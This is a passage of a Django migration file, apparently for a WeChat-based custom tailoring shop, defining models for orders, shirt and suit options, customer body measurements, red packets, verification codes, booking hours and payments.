('xiukou_cs', models.CharField(default=b'', choices=[(b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92', b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92', b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92', b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe5\x8f\xa3\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('xiabai_cs', models.CharField(default=b'', choices=[(b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86', b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe4\xb8\x8b\xe6\x91\x86\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('menjin_cs', models.CharField(default=b'', choices=[(b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f', b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\x97\xa8\xe8\xa5\x9f\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('houbei_cs', models.CharField(default=b'', choices=[(b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6', b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6'), (b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0', b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe8\x83\x8c\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('koudai_cs', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x8f\xa3\xe8\xa2\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('beizhu_cs', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe8\xa1\xac\xe8\xa1\xab\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('add_kuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe8\xa3\xa4\xe5\xad\x90')),
('add_majia', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe9\xa9\xac\xe7\x94\xb2')),
('majia_lingxing', models.CharField(default=b'', choices=[(b'V\xe9\xa2\x86', b'V\xe9\xa2\x86'), (b'U\xe9\xa2\x86', b'U\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe9\xa2\x86\xe5\x9e\x8b')),
('majia_kouxing', models.CharField(default=b'', choices=[(b'4', b'4'), (b'5', b'5'), (b'6', b'6'), (b'4*2', b'4*2'), (b'6*3', b'6*3'), (b'8*4', b'8*4')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe6\x89\xa3\xe5\x9e\x8b')),
('add_bespoke', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6Bespoke')),
('add_xiuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe7\xbb\xa3\xe5\xad\x97')),
('xiuzi', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\xbb\xa3\xe5\xad\x97', blank=True)),
('beizhu', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('huifang', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe5\x9b\x9e\xe8\xae\xbf\xe7\xbb\x93\xe6\x9e\x9c', blank=True)),
('xdy', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe4\xb8\x8b\xe5\x8d\x95\xe5\x91\x98', blank=True)),
('yjjq', models.DateTimeField(null=True, verbose_name=b'\xe9\xa2\x84\xe8\xae\xa1\xe4\xba\xa4\xe6\x9c\x9f', blank=True)),
('address', models.ForeignKey(verbose_name=b'\xe5\x9c\xb0\xe5\x9d\x80', blank=True, to='wap.Address4Order', null=True)),
('fabric', models.ForeignKey(verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99', blank=True, to='wap.Fabric', null=True)),
],
options={
'verbose_name': '\u8ba2\u5355',
'verbose_name_plural': '\u8ba2\u5355',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OrderPersonalization',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
('product_type', models.CharField(default=b'shirt', choices=[(b'suit', b'\xe8\xa5\xbf\xe6\x9c\x8d'), (b'shirt', b'\xe8\xa1\xac\xe8\xa1\xab')], max_length=10, blank=True, null=True, verbose_name=b'\xe5\xaf\xb9\xe5\xba\x94\xe4\xba\xa7\xe5\x93\x81\xe7\xb1\xbb\xe5\x9e\x8b')),
('product_name', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe5\xaf\xb9\xe5\xba\x94\xe4\xba\xa7\xe5\x93\x81\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
],
options={
'verbose_name': '\u5b9a\u5236\u4e2a\u6027\u5316',
'verbose_name_plural': '\u5b9a\u5236\u4e2a\u6027\u5316',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='Pack',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('volume', models.FloatField(null=True, verbose_name=b'\xe6\x95\xb0\xe9\x87\x8f', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u5305\u88c5\u6750\u6599',
'verbose_name_plural': '\u5305\u88c5\u6750\u6599',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Plant_update',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('zhizuo_time', models.DateTimeField(null=True, verbose_name=b'\xe5\x88\xb6\xe4\xbd\x9c\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('wancheng_time', models.DateTimeField(null=True, verbose_name=b'\xe5\xae\x8c\xe6\x88\x90\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('peishong_time', models.DateTimeField(null=True, verbose_name=b'\xe9\x85\x8d\xe9\x80\x81\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('jiaofu_time', models.DateTimeField(null=True, verbose_name=b'\xe4\xba\xa4\xe4\xbb\x98\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('plant_status', models.CharField(default=b'', max_length=32, verbose_name=b'\xe5\xb7\xa5\xe5\x8d\x95\xe7\x8a\xb6\xe6\x80\x81')),
('issue', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe9\x97\xae\xe9\xa2\x98\xe5\x8f\x8d\xe9\xa6\x88', blank=True)),
('gh', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe5\xb7\xa5\xe5\x8f\xb7', blank=True)),
('order', models.ForeignKey(verbose_name=b'\xe8\xae\xa2\xe5\x8d\x95', to='wap.Order')),
],
options={
'verbose_name': '\u5de5\u5355\u72b6\u6001',
'verbose_name_plural': '\u5de5\u5355\u72b6\u6001',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('img_with_text', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe5\xb8\xa6\xe6\x96\x87\xe5\xad\x97\xe7\x9a\x84\xe4\xba\xa7\xe5\x93\x81\xe5\x9b\xbe\xe7\x89\x87\xef\xbc\x8c\xe7\x94\xa8\xe5\x9c\xa8\xe4\xba\xa7\xe5\x93\x81\xe5\x88\x97\xe8\xa1\xa8', blank=True)),
('img', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe4\xba\xa7\xe5\x93\x81\xe5\x9b\xbe\xe7\x89\x87\xef\xbc\x8c\xe7\x94\xa8\xe5\x9c\xa8\xe4\xba\xa7\xe5\x93\x81\xe8\xaf\xa6\xe6\x83\x85\xe9\xa1\xb6\xe9\x83\xa8', blank=True)),
('price', models.IntegerField(null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('fabricname', models.TextField(null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xef\xbc\x8c|\xe5\x88\x86\xe5\x89\xb2', blank=True)),
('craft', models.TextField(null=True, verbose_name=b'\xe5\xb7\xa5\xe8\x89\xba\xef\xbc\x8c|\xe5\x88\x86\xe5\x89\xb2', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('type', models.CharField(default=b'shirt', max_length=10, verbose_name=b'\xe4\xba\xa7\xe5\x93\x81\xe7\xb1\xbb\xe5\x9e\x8b', choices=[(b'suit', b'\xe8\xa5\xbf\xe6\x9c\x8d'), (b'shirt', b'\xe8\xa1\xac\xe8\xa1\xab')])),
],
options={
'verbose_name': '\u4ea7\u54c1(\u897f\u88c5\u886c\u886b)',
'verbose_name_plural': '\u4ea7\u54c1(\u897f\u88c5\u886c\u886b)',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Redpacket',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('openid', models.CharField(default=b'', max_length=256, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\xa0\x87\xe8\xaf\x86\xe5\x8f\xb7')),
('phonenumber', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('nickname', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x98\xb5\xe7\xa7\xb0', blank=True)),
('headimgurl', models.CharField(max_length=500, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe5\xa4\xb4\xe5\x83\x8f', blank=True)),
('isUsed', models.CharField(default=b'0', max_length=2, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xbd\xbf\xe7\x94\xa8', choices=[(b'1', b'\xe5\xb7\xb2\xe4\xbd\xbf\xe7\x94\xa8'), (b'0', b'\xe6\x9c\xaa\xe4\xbd\xbf\xe7\x94\xa8')])),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('money', models.IntegerField(default=0, null=True, verbose_name=b'\xe9\x87\x91\xe9\xa2\x9d', blank=True)),
('type', models.CharField(default=b'', choices=[(b'A', b'\xe6\x8a\xbd\xe5\x8f\x96\xe7\xba\xa2\xe5\x8c\x85'), (b'B', b'\xe8\xbd\xac\xe5\x8f\x91\xe7\xba\xa2\xe5\x8c\x85')], max_length=10, blank=True, null=True, verbose_name=b'\xe7\xba\xa2\xe5\x8c\x85\xe7\xb1\xbb\xe5\x9e\x8b')),
('end_day', models.DateTimeField(null=True, verbose_name=b'\xe5\xa4\xb1\xe6\x95\x88\xe6\x97\xa5\xe6\x9c\x9f', blank=True)),
],
options={
'verbose_name': '\u5fae\u4fe1\u7ea2\u5305',
'verbose_name_plural': '\u5fae\u4fe1\u7ea2\u5305',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('openid', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe7\x94\xa8\xe6\x88\xb7\xe6\xa0\x87\xe8\xaf\x86', blank=True)),
('nickname', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe6\x98\xb5\xe7\xa7\xb0', blank=True)),
('name', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xa7\x93\xe5\x90\x8d', blank=True)),
('sex', models.CharField(default=b'\xe7\x94\xb7', choices=[(b'\xe5\xa5\xb3', b'\xe5\xa5\xb3'), (b'\xe7\x94\xb7', b'\xe7\x94\xb7')], max_length=10, blank=True, null=True, verbose_name=b'\xe6\x80\xa7\xe5\x88\xab')),
('phonenumber', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('password', models.CharField(default=b'', max_length=64, null=True, verbose_name=b'\xe5\xaf\x86\xe7\xa0\x81', blank=True)),
('shoulder_percent', models.IntegerField(default=0, null=True, verbose_name=b'\xe8\x82\xa9\xe5\xae\xbd\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('chest_percent', models.IntegerField(default=0, null=True, verbose_name=b'\xe8\x83\xb8\xe5\x9b\xb4\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('waist_percent', models.IntegerField(default=0, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x9b\xb4\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('hip_percent', models.IntegerField(default=0, null=True, verbose_name=b'\xe8\x87\x80\xe5\x9b\xb4\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('leg_percent', models.IntegerField(default=0, null=True, verbose_name=b'\xe8\x85\xbf\xe9\x95\xbf\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('measure_time', models.DateTimeField(null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('measure_phonenumber', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe6\x97\xb6\xe8\xae\xb0\xe5\xbd\x95\xe7\x9a\x84\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('measure_status', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe9\x87\x8f\xe4\xbd\x93\xe5\xae\x8c\xe6\x88\x90')),
('height', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe8\xba\xab\xe9\xab\x98', blank=True)),
('weight', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe4\xbd\x93\xe9\x87\x8d', blank=True)),
('favor', models.CharField(default=b'', choices=[(b'0', b'\xe4\xbf\xae\xe8\xba\xab'), (b'1', b'\xe5\x90\x88\xe8\xba\xab'), (b'2', b'\xe5\xae\xbd\xe6\x9d\xbe')], max_length=32, blank=True, null=True, verbose_name=b'\xe4\xb8\xaa\xe4\xba\xba\xe5\x81\x8f\xe5\xa5\xbd')),
('istie', models.CharField(default=b'', choices=[(b'0', b'\xe6\x89\x93\xe9\xa2\x86\xe5\xb8\xa6'), (b'1', b'\xe4\xb8\x8d\xe6\x89\x93\xe9\xa2\x86\xe5\xb8\xa6')], max_length=32, blank=True, null=True, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe6\x89\x93\xe9\xa2\x86\xe5\xb8\xa6')),
('iswatch', models.CharField(default=b'', choices=[(b'2', b'\xe6\x97\xa0\xe6\x89\x8b\xe8\xa1\xa8'), (b'1', b'\xe6\x89\x8b\xe8\xa1\xa8\xe5\x8f\xb3'), (b'0', b'\xe6\x89\x8b\xe8\xa1\xa8\xe5\xb7\xa6')], max_length=32, blank=True, null=True, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe6\x88\xb4\xe6\x89\x8b\xe8\xa1\xa8')),
('suit_shangyi', models.CharField(default=b'', choices=[(b'0', b'\xe9\x95\xbf'), (b'1', b'\xe7\x9f\xad')], max_length=32, blank=True, null=True, verbose_name=b'\xe8\xa5\xbf\xe8\xa3\x85\xe4\xb8\x8a\xe8\xa1\xa3')),
('lingwei', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9b\xb4', blank=True)),
('chest', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe8\x83\xb8\xe5\x9b\xb4', blank=True)),
('waist', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x9b\xb4', blank=True)),
('shoulder', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x82\xa9\xe5\xae\xbd', blank=True)),
('sleeve_right', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe9\x95\xbf\xef\xbc\x88\xe9\xbb\x98\xe8\xae\xa4\xe5\x8f\xb3\xef\xbc\x89', blank=True)),
('sleeve_lefet', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe9\x95\xbf\xef\xbc\x88\xe5\xb7\xa6\xef\xbc\x89', blank=True)),
('back_cloth', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\x90\x8e\xe8\xa1\xa3\xe9\x95\xbf', blank=True)),
('dianjian_right', models.CharField(default=b'0', max_length=32, verbose_name=b'\xe5\x9e\xab\xe8\x82\xa9\xef\xbc\x88\xe9\xbb\x98\xe8\xae\xa4\xe5\x8f\xb3\xef\xbc\x89', blank=True)),
('dianjian_left', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\x9e\xab\xe8\x82\xa9\xef\xbc\x88\xe5\xb7\xa6\xef\xbc\x89', blank=True)),
('chest_distance', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x83\xb8\xe9\x97\xb4\xe8\xb7\x9d', blank=True)),
('chest_height', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x83\xb8\xe9\xab\x98\xe7\x82\xb9', blank=True)),
('stomach', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x82\x9a\xe5\x9b\xb4', blank=True)),
('hip', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x87\x80\xe5\x9b\xb4', blank=True)),
('kuyao', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\x85\xb0\xe5\x9b\xb4', blank=True)),
('kuchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\xa4\xe9\x95\xbf', blank=True)),
('hengdang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe6\xa8\xaa\xe8\xa3\x86', blank=True)),
('xiwei', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x86\x9d\xe5\x9b\xb4', blank=True)),
('kukou', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\xa4\xe5\x8f\xa3', blank=True)),
('qunchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\x99\xe9\x95\xbf', blank=True)),
('lidang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe7\xab\x8b\xe8\xa3\x86', blank=True)),
('majia_qianchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe5\x89\x8d\xe9\x95\xbf', blank=True)),
('majia_houchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe5\x90\x8e\xe9\x95\xbf', blank=True)),
('xiulong', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe7\xac\xbc', blank=True)),
('chougenfen', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe6\xa0\xb9\xe8\x82\xa5', blank=True)),
('xiukou_right', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\x8f\xb3\xe8\xa2\x96\xe5\x8f\xa3', blank=True)),
('xiukou_left', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\xb7\xa6\xe8\xa2\x96\xe5\x8f\xa3', blank=True)),
('tingxiong', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe6\x8c\xba\xe8\x83\xb8', blank=True)),
('tuobei', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe9\xa9\xbc\xe8\x83\x8c', blank=True)),
('liangtishi', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe5\xb8\x88', blank=True)),
],
options={
'verbose_name': '\u6ce8\u518c\u7528\u6237',
'verbose_name_plural': '\u6ce8\u518c\u7528\u6237',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='VerificationCode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('code', models.CharField(max_length=8, null=True, verbose_name=b'\xe9\xaa\x8c\xe8\xaf\x81\xe7\xa0\x81', blank=True)),
('phone', models.CharField(max_length=16, null=True, verbose_name=b'\xe6\x89\x8b\xe6\x9c\xba\xe5\x8f\xb7\xe7\xa0\x81', blank=True)),
('use_time', models.DateTimeField(null=True, verbose_name=b'\xe9\xaa\x8c\xe8\xaf\x81\xe6\x97\xb6\xe9\x97\xb4')),
('expire_time', models.DateTimeField(null=True, verbose_name=b'\xe5\xa4\xb1\xe6\x95\x88\xe6\x97\xb6\xe9\x97\xb4')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u9a8c\u8bc1\u7801',
'verbose_name_plural': '\u9a8c\u8bc1\u7801',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Worktime',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(default=b'', max_length=256, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('type', models.CharField(default=b'A', choices=[(b'A', b'\xe5\xb7\xa5\xe4\xbd\x9c\xe6\x97\xb6\xe9\x97\xb4'), (b'B', b'\xe7\x89\xb9\xe6\xae\x8a\xe6\x97\xa5\xe6\x9c\x9f')], max_length=10, blank=True, null=True, verbose_name=b'\xe7\xb1\xbb\xe5\x9e\x8b')),
('start_time', models.CharField(default=b'0:00', choices=[(b'0:00', b'0:00'), (b'0:30', b'0:30'), (b'1:00', b'1:00'), (b'1:30', b'1:30'), (b'2:00', b'2:00'), (b'2:30', b'2:30'), (b'3:00', b'3:00'), (b'3:30', b'3:30'), (b'4:00', b'4:00'), (b'4:30', b'4:30'), (b'5:00', b'5:00'), (b'5:30', b'5:30'), (b'6:00', b'6:00'), (b'6:30', b'6:30'), (b'7:00', b'7:00'), (b'7:30', b'7:30'), (b'8:00', b'8:00'), (b'8:30', b'8:30'), (b'9:00', b'9:00'), (b'9:30', b'9:30'), (b'10:00', b'10:00'), (b'10:30', b'10:30'), (b'11:00', b'11:00'), (b'11:30', b'11:30'), (b'12:00', b'12:00'), (b'12:30', b'12:30'), (b'13:00', b'13:00'), (b'13:30', b'13:30'), (b'14:00', b'14:00'), (b'14:30', b'14:30'), (b'15:00', b'15:00'), (b'15:30', b'15:30'), (b'16:00', b'16:00'), (b'16:30', b'16:30'), (b'17:00', b'17:00'), (b'17:30', b'17:30'), (b'18:00', b'18:00'), (b'18:30', b'18:30'), (b'19:00', b'19:00'), (b'19:30', b'19:30'), (b'20:00', b'20:00'), (b'20:30', b'20:30'), (b'21:00', b'21:00'), (b'21:30', b'21:30'), (b'22:00', b'22:00'), (b'22:30', b'22:30'), (b'23:00', b'23:00'), (b'23:30', b'23:30')], max_length=10, blank=True, null=True, verbose_name=b'\xe5\xbc\x80\xe5\xa7\x8b\xe6\x97\xb6\xe9\x97\xb4')),
('end_time', models.CharField(default=b'0:00', choices=[(b'0:00', b'0:00'), (b'0:30', b'0:30'), (b'1:00', b'1:00'), (b'1:30', b'1:30'), (b'2:00', b'2:00'), (b'2:30', b'2:30'), (b'3:00', b'3:00'), (b'3:30', b'3:30'), (b'4:00', b'4:00'), (b'4:30', b'4:30'), (b'5:00', b'5:00'), (b'5:30', b'5:30'), (b'6:00', b'6:00'), (b'6:30', b'6:30'), (b'7:00', b'7:00'), (b'7:30', b'7:30'), (b'8:00', b'8:00'), (b'8:30', b'8:30'), (b'9:00', b'9:00'), (b'9:30', b'9:30'), (b'10:00', b'10:00'), (b'10:30', b'10:30'), (b'11:00', b'11:00'), (b'11:30', b'11:30'), (b'12:00', b'12:00'), (b'12:30', b'12:30'), (b'13:00', b'13:00'), (b'13:30', b'13:30'), (b'14:00', b'14:00'), (b'14:30', b'14:30'), (b'15:00', b'15:00'), (b'15:30', b'15:30'), (b'16:00', b'16:00'), (b'16:30', b'16:30'), (b'17:00', b'17:00'), (b'17:30', b'17:30'), (b'18:00', b'18:00'), (b'18:30', b'18:30'), (b'19:00', b'19:00'), (b'19:30', b'19:30'), (b'20:00', b'20:00'), (b'20:30', b'20:30'), (b'21:00', b'21:00'), (b'21:30', b'21:30'), (b'22:00', b'22:00'), (b'22:30', b'22:30'), (b'23:00', b'23:00'), (b'23:30', b'23:30')], max_length=10, blank=True, null=True, verbose_name=b'\xe7\xbb\x93\xe6\x9d\x9f\xe6\x97\xb6\xe9\x97\xb4')),
('start_day', models.DateTimeField(null=True, verbose_name=b'\xe5\xbc\x80\xe5\xa7\x8b\xe6\x97\xa5\xe6\x9c\x9f', blank=True)),
('end_day', models.DateTimeField(null=True, verbose_name=b'\xe7\xbb\x93\xe6\x9d\x9f\xe6\x97\xa5\xe6\x9c\x9f', blank=True)),
],
options={
'verbose_name': '\u9884\u7ea6\u65f6\u95f4\u9650\u5236',
'verbose_name_plural': '\u9884\u7ea6\u65f6\u95f4\u9650\u5236',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Wxpay',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('wxpay_id', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x94\xaf\xe4\xbb\x98\xe8\xae\xa2\xe5\x8d\x95\xe5\x8f\xb7', blank=True)),
